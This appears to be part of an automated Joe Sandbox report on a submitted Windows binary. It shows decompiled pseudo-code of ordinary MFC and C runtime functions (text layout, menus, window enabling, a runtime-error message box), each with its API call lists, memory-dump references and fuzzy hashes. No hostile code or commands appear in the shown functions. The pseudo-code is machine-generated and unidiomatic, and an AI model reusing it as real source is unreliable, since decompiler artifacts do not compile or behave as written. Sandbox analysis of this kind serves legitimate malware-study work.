				void* _t21;

				if(_a44 < 0 || _a44 >= 0x14) {
					_a44 = 0;
				}
				_t21 =  *((intOrPtr*)(0x4362b0 + _a44 * 4))(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
				return _t21;
			}

0x004037d7
0x004037df
0x004037df
0x00403811
0x0040381c

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9b55a29c4ff860124db4037a09d88fdcf40b724d14769906d711a8e0ebbbae
Instruction ID: c8df5cefcab56e12fb6afff3c38bb4f7a638dfcd913fb832871c6968f8fa9c0e
Opcode Fuzzy Hash: 8a9b55a29c4ff860124db4037a09d88fdcf40b724d14769906d711a8e0ebbbae
Instruction Fuzzy Hash: 4EF1E4B2A00108EBCB04CF99D995EEE77B9BF8C308F118259F919A7240D735EA15CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0042914E, Relevance: 15.2, APIs: 10, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0042914E(void* __ecx, long* _a4, int* _a8, int _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28, intOrPtr _a32, char* _a36, int* _a40, signed int* _a44) {
				intOrPtr _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v24;
				CHAR* _v28;
				int _v32;
				signed int _v36;
				signed int _v40;
				struct tagSIZE _v48;
				struct tagPOINT _v56;
				struct tagSIZE _v64;
				struct tagTEXTMETRICA _v120;
				struct tagTEXTMETRICA _v176;
				signed int _t119;
				signed int _t120;
				int _t121;
				signed int* _t125;
				long* _t127;
				signed int _t131;
				signed char _t132;
				int _t140;
				signed char* _t142;
				int _t144;
				int _t149;
				int _t153;
				signed int _t156;
				signed short _t159;
				signed char* _t167;
				int* _t170;
				signed int _t174;
				int _t175;
				int _t185;
				signed int _t187;
				int _t189;
				int _t190;
				void* _t191;
				int* _t193;

				_t191 = __ecx;
				GetTextMetricsA( *(__ecx + 8),  &_v120);
				GetTextMetricsA( *(__ecx + 4),  &_v176);
				GetTextExtentPoint32A( *(__ecx + 8), 0x42e890, 1,  &_v48);
				_t119 = GetTextAlign( *(__ecx + 8));
				_v40 = _t119;
				_t120 = _t119 & 0x00000001;
				_v36 = _t120;
				if(_t120 == 0) {
					_t170 = _a8;
				} else {
					GetCurrentPositionEx( *(__ecx + 4),  &_v56);
					_t170 = _a8;
					 *_t170 = _v56.x;
				}
				_t121 =  *_t170;
				_t193 = _a40;
				_t167 = _a12;
				_t185 = 0;
				_v28 = _t167;
				_v32 = _t121;
				_a12 = _t121;
				_v12 = 0;
				_v20 = 0;
				if(_a20 != 0) {
					if(_a24 != 1) {
						_t159 = GetTabbedTextExtentA( *(_t191 + 8), 0x42e88c, 1, 0, 0);
						_t170 = _a8;
						_t185 = 0;
						_v20 = _t159 & 0x0000ffff;
					} else {
						_v20 =  *_a28;
					}
				}
				_v8 = _t185;
				if( *_a16 <= _t185) {
					L31:
					_t187 = _v40 & 0x00000006;
					_v48.cx = _a12 -  *_t170;
					_t125 = _a44;
					 *_t125 =  *_t125 & 0x00000000;
					if(_t187 != 0) {
						if(_t187 != 6) {
							if(_t187 == 2) {
								 *_t125 = _v12;
							}
							L38:
							if(_v36 != 0) {
								MoveToEx( *(_t191 + 4),  *_t170, _v56.y, 0);
							}
							 *_a16 = _t193 - _a40 >> 2;
							_t127 = _a4;
							 *_t127 = _v48.cx;
							_t127[1] = _v48.cy;
							return _t127;
						}
						asm("cdq");
						_t131 = _v12 - _t187 >> 1;
						L33:
						 *_t170 =  *_t170 + _t131;
						goto L38;
					}
					_t131 = _v12;
					goto L33;
				} else {
					while(1) {
						_t132 =  *_t167;
						_t174 = 0 | _t132 == _v120.tmBreakChar;
						_v24 = _t174;
						if(_t174 != _t185 || _a20 != _t185 && _t132 == 9) {
							GetTextExtentPoint32A( *(_t191 + 8), _v28, _v24 - _v28 + _t167,  &_v64);
							_t140 = _v64.cx - _v120.tmOverhang + _v32;
							if(_v24 == 0) {
								_t140 = E0042911A(_t140, _a24, _a28, _a32, _v20);
							}
							_t175 = _t140;
							if(_t193 != _a40) {
								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t175 - _a12;
							} else {
								_v12 = _v12 + _t175 - _a12;
							}
							_a12 = _t140;
							_v32 = _t140;
							_v28 =  &(_t167[1]);
						} else {
							_t144 = _t132 & 0x000000ff;
							if(( *(_t144 + 0x43b761) & 0x00000004) == 0) {
								GetCharWidthA( *(_t191 + 4), _t144, _t144,  &_v16);
								if(GetCharWidthA( *(_t191 + 8),  *_t167 & 0x000000ff,  *_t167 & 0x000000ff, _t193) == 0) {
									 *_t193 = _v120.tmAveCharWidth;
								}
								_t189 = _v16;
							} else {
								_t189 = _v176.tmAveCharWidth;
								 *_t193 = _v120.tmAveCharWidth;
							}
							_t190 = _t189 - _v176.tmOverhang;
							 *_t193 =  *_t193 - _v120.tmOverhang;
							_t149 =  *_t193;
							_a12 = _a12 + _t149;
							_v16 = _t190;
							if(_t193 != _a40) {
								asm("cdq");
								_t156 = _t149 - _t190 - _t190 >> 1;
								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t156;
								 *_t193 = _t149 - _t156;
							}
							_a36 = _a36 + 1;
							 *_a36 =  *_t167;
							if(( *(( *_t167 & 0x000000ff) + 0x43b761) & 0x00000004) != 0) {
								_a36 = _a36 + 1;
								 *_a36 = _t167[1];
								_t153 =  *_t193;
								_a12 = _a12 + _t153;
								_t193 =  &(_t193[1]);
								_v8 = _v8 + 1;
								 *_t193 = _t153;
							}
							_t193 =  &(_t193[1]);
						}
						_t142 = E00406AFA(_t167);
						_v8 = _v8 + 1;
						_t167 = _t142;
						if(_v8 >=  *_a16) {
							break;
						}
						_t185 = 0;
					}
					_t170 = _a8;
					goto L31;
				}
			}

APIs

GetTextMetricsA.GDI32(?,?), ref: 00429168
GetTextMetricsA.GDI32(?,?), ref: 00429174
GetTextExtentPoint32A.GDI32(?,0042E890,00000001,?), ref: 00429184
GetTextAlign.GDI32(?), ref: 0042918D
GetCurrentPositionEx.GDI32(?,?), ref: 004291A5
GetTabbedTextExtentA.USER32(?,0042E88C,00000001,00000000,00000000), ref: 004291F3
GetCharWidthA.GDI32(?,?,?,?), ref: 0042925A
GetCharWidthA.GDI32(?,00000000,00000000,?), ref: 00429269
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 004292E9
MoveToEx.GDI32(?,?,?,00000000), ref: 00429397

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Text$Extent$CharMetricsPoint32Width$AlignCurrentMovePositionTabbed
String ID:
API String ID: 2070200100-0
Opcode ID: dbc0e650c6b3921614c61be6481f5bcec17f5e74d2995e425cda8442065db2ea
Instruction ID: 5ee3fa6e800e5c42c7f25724716c3f9a342090dd9abbfd9a25ef7c0a74f7065c
Opcode Fuzzy Hash: dbc0e650c6b3921614c61be6481f5bcec17f5e74d2995e425cda8442065db2ea
Instruction Fuzzy Hash: EE914670A0021AEFCF15CFA8D884AEEBBB5FF48304F54856AE859A7250D334AD51CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0042185A, Relevance: 15.1, APIs: 10, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042185A(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebp;
				int _t53;
				int _t58;
				int _t61;
				signed int _t65;
				int _t66;
				void* _t67;
				int _t69;
				intOrPtr _t73;
				int _t74;
				int _t75;
				intOrPtr* _t77;
				struct HMENU__* _t83;
				intOrPtr _t84;

				_t73 = __ecx;
				_v8 = __ecx;
				_t53 = E0041A8B4( *((intOrPtr*)(__ecx + 0x1c)));
				if(_a12 == 0) {
					_t77 =  *((intOrPtr*)(__ecx + 0x68));
					_t84 = _a4;
					if(_t77 == 0) {
						L3:
						E00412F9D( &_v48);
						_v36 = _t84;
						if( *((intOrPtr*)(E004249C4() + 0x54)) !=  *(_t84 + 4)) {
							if(GetMenu( *(_t73 + 0x1c)) != 0) {
								_t67 = E00414CEF(_t73);
								if(_t67 != 0) {
									_t83 = GetMenu( *(_t67 + 0x1c));
									if(_t83 != 0) {
										_t69 = GetMenuItemCount(_t83);
										_t75 = 0;
										_a12 = _t69;
										if(_t69 > 0) {
											while(GetSubMenu(_t83, _t75) !=  *(_t84 + 4)) {
												_t75 = _t75 + 1;
												if(_t75 < _a12) {
													continue;
												} else {
												}
												goto L13;
											}
											_push(_t83);
											_v12 = E00417635();
										}
										L13:
										_t73 = _v8;
									}
								}
							}
						} else {
							_v12 = _t84;
						}
						_t53 = GetMenuItemCount( *(_t84 + 4));
						_v40 = _v40 & 0x00000000;
						_v16 = _t53;
						if(_t53 > 0) {
							do {
								_t58 = GetMenuItemID( *(_t84 + 4), _v40);
								_v44 = _t58;
								if(_t58 != 0) {
									if(_t58 != 0xffffffff) {
										_v32 = _v32 & 0x00000000;
										if( *((intOrPtr*)(_t73 + 0x3c)) != 0 && _t58 < 0xf000) {
											_push(1);
											_pop(0);
										}
										_push(0);
										goto L27;
									} else {
										_push(GetSubMenu( *(_t84 + 4), _v40));
										_t65 = E00417635();
										_v32 = _t65;
										if(_t65 != 0) {
											_t66 = GetMenuItemID( *(_t65 + 4), 0);
											_v44 = _t66;
											if(_t66 != 0 && _t66 != 0xffffffff) {
												_push(0);
												L27:
												_push(_t73);
												E00413162( &_v48);
												_t61 = GetMenuItemCount( *(_t84 + 4));
												_t74 = _t61;
												if(_t74 < _v16) {
													_v40 = _v40 + _t61 - _v16;
													while(_v40 < _t74 && GetMenuItemID( *(_t84 + 4), _v40) == _v44) {
														_v40 = _v40 + 1;
													}
												}
												_v16 = _t74;
												_t73 = _v8;
											}
										}
									}
								}
								_v40 = _v40 + 1;
								_t53 = _v40;
							} while (_t53 < _v16);
						}
					} else {
						_t53 =  *((intOrPtr*)( *_t77 + 0x74))(_t84, _a8, 0);
						if(_t53 == 0) {
							goto L3;
						}
					}
				}
				return _t53;
			}

APIs

Part of subcall function 0041A8B4: GetFocus.USER32(?,?,?,00421870,?), ref: 0041A8B7
Part of subcall function 0041A8B4: GetParent.USER32(00000000), ref: 0041A8DE
Part of subcall function 0041A8B4: GetWindowLongA.USER32 ref: 0041A8F9
Part of subcall function 0041A8B4: GetParent.USER32(?), ref: 0041A907
Part of subcall function 0041A8B4: GetDesktopWindow.USER32 ref: 0041A90B
Part of subcall function 0041A8B4: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0041A91F

GetMenu.USER32(?), ref: 004218BD
GetMenu.USER32(?), ref: 004218D1
GetMenuItemCount.USER32 ref: 004218DA
GetSubMenu.USER32 ref: 004218EB
GetMenuItemCount.USER32 ref: 0042190D
GetMenuItemID.USER32(?,00000000), ref: 0042192E
GetSubMenu.USER32 ref: 00421946
GetMenuItemID.USER32(?,00000000), ref: 0042195E
GetMenuItemCount.USER32 ref: 00421995
GetMenuItemID.USER32(?,00000000), ref: 004219B3

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: 6dca45552e476573e8ddd484fced48f908dc2b4a0e5e43a68bf7886d0696cfe4
Instruction ID: c2df077858419d5e37a5876f97d7879e649ce0b97625e1102e6641939069eb9a
Opcode Fuzzy Hash: 6dca45552e476573e8ddd484fced48f908dc2b4a0e5e43a68bf7886d0696cfe4
Instruction Fuzzy Hash: C35190B0B002189FCF11EF65D990BAEB7B5EF18314FA0446AE411E6261D739DD82DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00420900, Relevance: 15.1, APIs: 10, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00420900() {
				void* __ecx;
				void* __ebp;
				struct HWND__* _t21;
				int _t33;
				void* _t40;
				void* _t41;
				struct HWND__* _t46;
				struct HWND__* _t47;
				signed int _t48;
				signed int _t49;
				void* _t50;

				_t40 = _t41;
				 *(_t40 + 0xa0) =  *(_t40 + 0xa0) + 1;
				_t21 = _t40 + 0xa0;
				if( *(_t40 + 0xa0) > 1) {
					L18:
					return _t21;
				}
				 *((intOrPtr*)(_t50 + 0x14)) = E00414CEF(_t41);
				_t48 = 0;
				_t21 = GetWindow(GetDesktopWindow(), 5);
				_t46 = _t21;
				if(_t46 == 0) {
					goto L18;
				} else {
					goto L2;
				}
				do {
					L2:
					if(IsWindowEnabled(_t46) != 0) {
						_push(_t46);
						if(E00413767() != 0 && E004208E0( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t46) != 0 && SendMessageA(_t46, 0x36c, 0, 0) == 0) {
							_t48 = _t48 + 1;
						}
					}
					_t21 = GetWindow(_t46, 2);
					_t46 = _t21;
				} while (_t46 != 0);
				if(_t48 != 0) {
					 *(_t40 + 0xa4) = E004131DD(4 + _t48 * 4);
					_push(5);
					_t49 = 0;
					_push(GetDesktopWindow());
					while(1) {
						_t47 = GetWindow();
						if(_t47 == 0) {
							break;
						}
						if(IsWindowEnabled(_t47) != 0) {
							_push(_t47);
							if(E00413767() != 0 && E004208E0( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t47) != 0) {
								_t33 = SendMessageA(_t47, 0x36c, 0, 0);
								if(_t33 == 0) {
									EnableWindow(_t47, _t33);
									( *(_t40 + 0xa4))[_t49] = _t47;
									_t49 = _t49 + 1;
								}
							}
						}
						_push(2);
						_push(_t47);
					}
					_t21 =  *(_t40 + 0xa4);
					_t21[_t49] = _t21[_t49] & 0x00000000;
				}
			}

APIs

GetDesktopWindow.USER32 ref: 0042092D
GetWindow.USER32(00000000), ref: 0042093A
IsWindowEnabled.USER32(00000000), ref: 00420947
SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 00420976
GetWindow.USER32(00000000,00000002), ref: 00420984
GetDesktopWindow.USER32 ref: 004209AC
GetWindow.USER32(00000000), ref: 004209B3
IsWindowEnabled.USER32(00000000), ref: 004209BC
SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 004209EB
EnableWindow.USER32(00000000,00000000), ref: 004209F7

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$DesktopEnabledMessageSend$Enable
String ID:
API String ID: 2339141687-0
Opcode ID: b425f5d9508085c9cae4404486b252f16e1b35d7c8077e0574aa4d7a51abd98b
Instruction ID: 9d4a9da4e21fb217c8a7ce5c71c2f292f8e7f618580f1a2ae5b0fad087dd6ca4
Opcode Fuzzy Hash: b425f5d9508085c9cae4404486b252f16e1b35d7c8077e0574aa4d7a51abd98b
Instruction Fuzzy Hash: 6B31B1717013286FE731AF25AC05B6B779CEF01795F850026FE41DA293DB68C8418AED

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC61, Relevance: 15.1, APIs: 10, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041EC61(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t39;
				int _t42;
				int _t61;
				int _t64;
				void* _t66;
				long _t67;
				int _t69;

				_t67 = _a4;
				_t66 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t67);
				if(( *(_t67 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t66 + 0x1c),  &_v24);
					_t42 = _a4;
					_t69 = _v24.right - _v24.left;
					_t64 =  *(_t42 + 0x10);
					_t61 = _v24.bottom - _v24.top;
					_t39 =  *(_t42 + 0x14);
					_v8 = _t64;
					_a4 = _t39;
					if(_t64 != _t69 && ( *(_t66 + 0x65) & 0x00000004) != 0) {
						SetRect( &_v24, _t64 -  *0x439bf0, 0, _t64, _t39);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						SetRect( &_v24, _t69 -  *0x439bf0, 0, _t69, _a4);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						_t64 = _v8;
						_t39 = _a4;
					}
					if(_t39 != _t61 && ( *(_t66 + 0x65) & 0x00000008) != 0) {
						SetRect( &_v24, 0, _t39 -  *0x439bf4, _t64, _t39);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						SetRect( &_v24, 0, _t61 -  *0x439bf4, _v8, _t61);
						return InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
					}
				}
				return _t39;
			}

APIs

DefWindowProcA.USER32(?,00000046,00000000,?), ref: 0041EC77
GetWindowRect.USER32 ref: 0041EC8E
SetRect.USER32 ref: 0041ECC8
InvalidateRect.USER32(?,?,00000001), ref: 0041ECD7
SetRect.USER32 ref: 0041ECEE
InvalidateRect.USER32(?,?,00000001), ref: 0041ECFD
SetRect.USER32 ref: 0041ED28
InvalidateRect.USER32(?,?,00000001), ref: 0041ED33
SetRect.USER32 ref: 0041ED4A
InvalidateRect.USER32(?,?,00000001), ref: 0041ED55

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Rect$Invalidate$Window$Proc
String ID:
API String ID: 570070710-0
Opcode ID: 8724871abec8598df3563b0eda9aa5d8796d70e5df21c29b53d9ac8203d78ebf
Instruction ID: 516b3e1e2029e257780fbb0876dd7829c2ddb4b881f79dfa1f5106cbf91c212e
Opcode Fuzzy Hash: 8724871abec8598df3563b0eda9aa5d8796d70e5df21c29b53d9ac8203d78ebf
Instruction Fuzzy Hash: EC31CB7590020ABFDB10DF94ED88FAA7B7DFB04344F544125FA01A61A0D774AE95CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409911, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00409911(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x437068;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x4370f8) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x437068; // 0x3c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x439cf0; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x436ba4 == 1) {
						_t16 = _t54 + 0x43706c; // 0x42f53c
						_t56 = _t16;
						_t19 = E00405A40( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00409B00( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00405A40( &_v424) + 1 > 0x3c) {
								_t49 = E00405A40( &_v424) +  &_v424 - 0x3b;
								E0040AD30(E00405A40( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00409B00( &_v164, "Runtime Error!\n\nProgram: ");
							E00409B10( &_v164, _t49);
							E00409B10( &_v164, "\n\n");
							_t12 = _t54 + 0x43706c; // 0x42f53c
							E00409B10( &_v164,  *_t12);
							_t17 = E0040AC99( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0040997E
GetStdHandle.KERNEL32(000000F4,0042F53C,00000000,?,00000000,?), ref: 00409A54
WriteFile.KERNEL32(00000000), ref: 00409A5B

Strings

..., xrefs: 004099D0
hpC, xrefs: 0040991F
<program name unknown>, xrefs: 0040998E
Runtime Error!Program: , xrefs: 004099E4
Microsoft Visual C++ Runtime Library, xrefs: 00409A2A

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $hpC
API String ID: 3784150691-1464146632
Opcode ID: 33035c65495730e30a5fb77a12ee862b660262d042e41123e8c96b74bcb04291
Instruction ID: b539e999a38423ee123e62db49a79e9b5e142f56b6bf41d1579e584f354440c8
Opcode Fuzzy Hash: 33035c65495730e30a5fb77a12ee862b660262d042e41123e8c96b74bcb04291
Instruction Fuzzy Hash: AF31C372700218AEDF20EA61DC86FAA377CEB45304F90047BF545F61C2E678AE84CE59

Uniqueness

Uniqueness Score: -1.00%

Function 0041538C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041538C(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __ebp;
				void* _t14;
				void* _t17;
				void* _t18;
				void* _t28;
				struct HWND__* _t29;
				signed int _t33;
				void* _t36;
				void* _t40;
				void* _t43;

				_t28 = __ebx;
				_push(__ecx);
				_t36 = __ecx;
				_t40 = E00414CEF(__ecx);
				_t33 = _a4 & 0x0000fff0;
				_t14 = _t33 - 0xf040;
				if(_t14 == 0) {
					L12:
					if(_a8 != 0x75 || _t40 == 0) {
						L15:
						goto L16;
					} else {
						E004166F5(_t40);
						L11:
						_push(1);
						_pop(0);
						L16:
						return 0;
					}
				}
				_t17 = _t14 - 0x10;
				if(_t17 == 0) {
					goto L12;
				}
				_t18 = _t17 - 0x10;
				if(_t18 == 0 || _t18 == 0xa0) {
					if(_t33 == 0xf060 || _a8 != 0) {
						if(_t40 != 0) {
							_push(_t28);
							_t29 =  *(_t36 + 0x1c);
							_v8 = GetFocus();
							E00413740(_t43, SetActiveWindow( *(_t40 + 0x1c)));
							SendMessageA( *(_t40 + 0x1c), 0x112, _a4, _a8);
							if(IsWindow(_t29) != 0) {
								SetActiveWindow(_t29);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L11;
				} else {
					goto L15;
				}
			}

APIs

GetFocus.USER32 ref: 004153DC
SetActiveWindow.USER32(?), ref: 004153EE
SendMessageA.USER32(?,00000112,?,?), ref: 00415404
IsWindow.USER32(?), ref: 00415411
SetActiveWindow.USER32(?), ref: 00415418
IsWindow.USER32(?), ref: 0041541D
SetFocus.USER32(?), ref: 00415427

Strings

u, xrefs: 00415432

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 8c48182a88e980f122088be52c97c01ef4bfbd378e51f1298f5237cc586278ca
Instruction ID: 08e7680b70c01f71feb78b7b04bbbad669989e92906b740bb6337346909a31ec
Opcode Fuzzy Hash: 8c48182a88e980f122088be52c97c01ef4bfbd378e51f1298f5237cc586278ca
Instruction Fuzzy Hash: D2110372600619EBDB346F25ED48AEA7B64EB80315F448037E901962A1D77CDDC2DA98

Uniqueness

Uniqueness Score: -1.00%

Function 004170E7, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004170E7(intOrPtr __ecx, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				void* _t11;
				signed int _t15;
				int _t20;
				char* _t24;
				struct HDC__* _t26;

				_v8 = __ecx;
				_t20 = 0xa;
				_t24 = "System";
				_t11 = GetStockObject(0x11);
				if(_t11 != 0) {
					L2:
					if(GetObjectA(_t11, 0x3c,  &_v68) != 0) {
						_t24 =  &_v40;
						_t26 = GetDC(0);
						_t15 = _v68;
						if(_t15 < 0) {
							_v68 =  ~_t15;
						}
						_t20 = MulDiv(_v68, 0x48, GetDeviceCaps(_t26, 0x5a));
						ReleaseDC(0, _t26);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t20;
					}
					return E00416FCD(_v8, _t24, _a4);
				}
				_t11 = GetStockObject(0xd);
				if(_t11 == 0) {
					goto L6;
				}
				goto L2;
			}

APIs

GetStockObject.GDI32(00000011), ref: 00417103
GetStockObject.GDI32(0000000D), ref: 0041710B
GetObjectA.GDI32(00000000,0000003C,?), ref: 00417118
GetDC.USER32(00000000), ref: 00417127
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041713E
MulDiv.KERNEL32(?,00000048,00000000), ref: 0041714A
ReleaseDC.USER32 ref: 00417155

Strings

System, xrefs: 004170FC, 0041716B

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 88a62be2883dc778bffe4279af9f13e5efe5524b205705b3f86c503938333c71
Instruction ID: aedc63dc14c356acfddf8dbf112d5b7e9114f9d10090a13ed9499bd610fb2d75
Opcode Fuzzy Hash: 88a62be2883dc778bffe4279af9f13e5efe5524b205705b3f86c503938333c71
Instruction Fuzzy Hash: 2F113371B00318BBEB209BA19C45FAF7B78FB05790F404026FA05E62C0D7749D42CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC99, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

